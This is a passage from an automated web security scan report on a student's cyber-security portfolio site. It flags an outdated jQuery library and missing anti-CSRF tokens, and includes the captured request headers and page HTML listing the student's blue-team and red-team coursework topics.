E;h.async&&h.timeout>0&&(u=e.setTimeout(function(){E.abort("timeout")},h.timeout));try{c=!1,i.send(b,k)}catch(e){if(c)throw e;k(-1,e)}}else k(-1,"No Transport");function k(t,n,r,s){var l,p,d,b,T,C=n;c||(c=!0,u&&e.clearTimeout(u),i=void 0,a=s||"",E.readyState=t>0?4:0,l=t>=200&&t<300||304===t,r&&(b=Xt(h,E,r)),b=Ut(h,b,E,l),l?(h.ifModified&&((T=E.getResponseHeader("Last-Modified"))&&(w.lastModified[o]=T),(T=E.getResponseHeader("etag"))&&(w.etag[o]=T)),204===t||"HEAD"===h.type?C="nocontent":304===t?C="notmodified":(C=b.state,p=b.data,l=!(d=b.error))):(d=C,!t&&C||(C="error",t<0&&(t=0))),E.status=t,E.statusText=(n||C)+"",l?v.resolveWith(g,[p,C,E]):v.rejectWith(g,[E,C,d]),E.statusCode(x),x=void 0,f&&y.trigger(l?"ajaxSuccess":"ajaxError",[E,h,l?p:d]),m.fireWith(g,[E,C]),f&&(y.trigger("ajaxComplete",[E,h]),--w.active||w.event.trigger("ajaxStop")))}return E},getJSON:function(e,t,n){return w.get(e,t,n,"json")},getScript:function(e,t){return w.get(e,void 0,t,"script")}}),w.each(["get","post"],function(e,t){w[t]=function(e,n,r,i){return g(n)&&(i=i||r,r=n,n=void 0),w.ajax(w.extend({url:e,type:t,dataType:i,data:n,success:r},w.isPlainObject(e)&&e))}}),w._evalUrl=function(e){return w.ajax({url:e,type:"GET",dataType:"script",cache:!0,async:!1,global:!1,"throws":!0})},w.fn.extend({wrapAll:function(e){var t;return this[0]&&(g(e)&&(e=e.call(this[0])),t=w(e,this[0].ownerDocument).eq(0).clone(!0),this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){var e=this;while(e.firstElementChild)e=e.firstElementChild;return e}).append(this)),this},wrapInner:function(e){return g(e)?this.each(function(t){w(this).wrapInner(e.call(this,t))}):this.each(function(){var t=w(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=g(e);return this.each(function(n){w(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(e){return this.parent(e).not("body").each(function(){w(this).replaceWith(this.childNodes)}),this}}),w.expr.pseudos.hidden=function(e){return!w.expr.pseudos.visible(e)},w.expr.pseudos.visible=function(e){return!!(e.offsetWidth||e.offsetHeight||e.getClientRects().length)},w.ajaxSettings.xhr=function(){try{return new e.XMLHttpRequest}catch(e){}};var Vt={0:200,1223:204},Gt=w.ajaxSettings.xhr();h.cors=!!Gt&&"withCredentials"in Gt,h.ajax=Gt=!!Gt,w.ajaxTransport(function(t){var n,r;if(h.cors||Gt&&!t.crossDomain)return{send:function(i,o){var a,s=t.xhr();if(s.open(t.type,t.url,t.async,t.username,t.password),t.xhrFields)for(a in t.xhrFields)s[a]=t.xhrFields[a];t.mimeType&&s.overrideMimeType&&s.overrideMimeType(t.mimeType),t.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");for(a in i)s.setRequestHeader(a,i[a]);n=function(e){return function(){n&&(n=r=s.onload=s.onerror=s.onabort=s.ontimeout=s.onreadystatechange=null,"abort"===e?s.abort():"error"===e?"number"!=typeof s.status?o(0,"error"):o(s.status,s.statusText):o(Vt[s.status]||s.status,s.statusText,"text"!==(s.responseType||"text")||"string"!=typeof s.responseText?{binary:s.response}:{text:s.responseText},s.getAllResponseHeaders()))}},s.onload=n(),r=s.onerror=s.ontimeout=n("error"),void 0!==s.onabort?s.onabort=r:s.onreadystatechange=function(){4===s.readyState&&e.setTimeout(function(){n&&r()})},n=n("abort");try{s.send(t.hasContent&&t.data||null)}catch(e){if(n)throw e}},abort:function(){n&&n()}}}),w.ajaxPrefilter(function(e){e.crossDomain&&(e.contents.script=!1)}),w.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/\b(?:java|ecma)script\b/},converters:{"text script":function(e){return w.globalEval(e),e}}}),w.ajaxPrefilter("script",function(e){void 0===e.cache&&(e.cache=!1),e.crossDomain&&(e.type="GET")}),w.ajaxTransport("script",function(e){if(e.crossDomain){var t,n;return{send:function(i,o){t=w("<script>").prop({charset:e.scriptCharset,src:e.url}).on("load error",n=function(e){t.remove(),n=null,e&&o("error"===e.type?404:200,e.type)}),r.head.appendChild(t[0])},abort:function(){n&&n()}}}});var Yt=[],Qt=/(=)\?(?=&|$)|\?\?/;w.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Yt.pop()||w.expando+"_"+Et++;return this[e]=!0,e}}),w.ajaxPrefilter("json jsonp",function(t,n,r){var i,o,a,s=!1!==t.jsonp&&(Qt.test(t.url)?"url":"string"==typeof t.data&&0===(t.contentType||"").indexOf("application/x-www-form-urlencoded")&&Qt.test(t.data)&&"data");if(s||"jsonp"===t.dataTypes[0])return i=t.jsonpCallback=g(t.jsonpCallback)?t.jsonpCallback():t.jsonpCallback,s?t[s]=t[s].replace(Qt,"$1"+i):!1!==t.jsonp&&(t.url+=(kt.test(t.url)?"&":"?")+t.jsonp+"="+i),t.converters["script json"]=function(){return a||w.error(i+" was not called"),a[0]},t.dataTypes[0]="json",o=e[i],e[i]=function(){a=arguments},r.always(function(){void 0===o?w(e).removeProp(i):e[i]=o,t[i]&&(t.jsonpCallback=n.jsonpCallback,Yt.push(i)),a&&g(o)&&o(a[0]),a=o=void 0}),"script"}),h.createHTMLDocument=function(){var e=r.implementation.createHTMLDocument("").body;return e.innerHTML="<form></form><form></form>",2===e.childNodes.length}(),w.parseHTML=function(e,t,n){if("string"!=typeof e)return[];"boolean"==typeof t&&(n=t,t=!1);var i,o,a;return t||(h.createHTMLDocument?((i=(t=r.implementation.createHTMLDocument("")).createElement("base")).href=r.location.href,t.head.appendChild(i)):t=r),o=A.exec(e),a=!n&&[],o?[t.createElement(o[1])]:(o=xe([e],t,a),a&&a.length&&w(a).remove(),w.merge([],o.childNodes))},w.fn.load=function(e,t,n){var r,i,o,a=this,s=e.indexOf(" ");return s>-1&&(r=vt(e.slice(s)),e=e.slice(0,s)),g(t)?(n=t,t=void 0):t&&"object"==typeof t&&(i="POST"),a.length>0&&w.ajax({url:e,type:i||"GET",dataType:"html",data:t}).done(function(e){o=arguments,a.html(r?w("<div>").append(w.parseHTML(e)).find(r):e)}).always(n&&function(e,t){a.each(function(){n.apply(this,o||[e.responseText,t,e])})}),this},w.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){w.fn[t]=function(e){return this.on(t,e)}}),w.expr.pseudos.animated=function(e){return w.grep(w.timers,function(t){return e===t.elem}).length},w.offset={setOffset:function(e,t,n){var r,i,o,a,s,u,l,c=w.css(e,"position"),f=w(e),p={};"static"===c&&(e.style.position="relative"),s=f.offset(),o=w.css(e,"top"),u=w.css(e,"left"),(l=("absolute"===c||"fixed"===c)&&(o+u).indexOf("auto")>-1)?(a=(r=f.position()).top,i=r.left):(a=parseFloat(o)||0,i=parseFloat(u)||0),g(t)&&(t=t.call(e,n,w.extend({},s))),null!=t.top&&(p.top=t.top-s.top+a),null!=t.left&&(p.left=t.left-s.left+i),"using"in t?t.using.call(e,p):f.css(p)}},w.fn.extend({offset:function(e){if(arguments.length)return void 0===e?this:this.each(function(t){w.offset.setOffset(this,e,t)});var t,n,r=this[0];if(r)return r.getClientRects().length?(t=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:t.top+n.pageYOffset,left:t.left+n.pageXOffset}):{top:0,left:0}},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===w.css(r,"position"))t=r.getBoundingClientRect();else{t=this.offset(),n=r.ownerDocument,e=r.offsetParent||n.documentElement;while(e&&(e===n.body||e===n.documentElement)&&"static"===w.css(e,"position"))e=e.parentNode;e&&e!==r&&1===e.nodeType&&((i=w(e).offset()).top+=w.css(e,"borderTopWidth",!0),i.left+=w.css(e,"borderLeftWidth",!0))}return{top:t.top-i.top-w.css(r,"marginTop",!0),left:t.left-i.left-w.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent;while(e&&"static"===w.css(e,"position"))e=e.offsetParent;return e||be})}}),w.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,t){var n="pageYOffset"===t;w.fn[e]=function(r){return z(this,function(e,r,i){var o;if(y(e)?o=e:9===e.nodeType&&(o=e.defaultView),void 0===i)return o?o[t]:e[r];o?o.scrollTo(n?o.pageXOffset:i,n?i:o.pageYOffset):e[r]=i},e,r,arguments.length)}}),w.each(["top","left"],function(e,t){w.cssHooks[t]=_e(h.pixelPosition,function(e,n){if(n)return n=Fe(e,t),We.test(n)?w(e).position()[t]+"px":n})}),w.each({Height:"height",Width:"width"},function(e,t){w.each({padding:"inner"+e,content:t,"":"outer"+e},function(n,r){w.fn[r]=function(i,o){var a=arguments.length&&(n||"boolean"!=typeof i),s=n||(!0===i||!0===o?"margin":"border");return z(this,function(t,n,i){var o;return y(t)?0===r.indexOf("outer")?t["inner"+e]:t.document.documentElement["client"+e]:9===t.nodeType?(o=t.documentElement,Math.max(t.body["scroll"+e],o["scroll"+e],t.body["offset"+e],o["offset"+e],o["client"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each("blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu".split(" "),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}}),w.proxy=function(e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return("number"===t||"string"===t)&&!isNaN(e-parseFloat(e))},"function"==typeof define&&define.amd&&define("jquery",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});
          
          Evidence
          /*! jQuery v3.3.1
          Solution

          Please upgrade to the latest version of jquery.

  2. Risk=Low, Confidence=Medium (9)

    1. https://beekmans.dev (9)

      1. Absence of Anti-CSRF Tokens (2)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          No Anti-CSRF tokens were found in a HTML submission form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "email" "name" "phone" ].

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
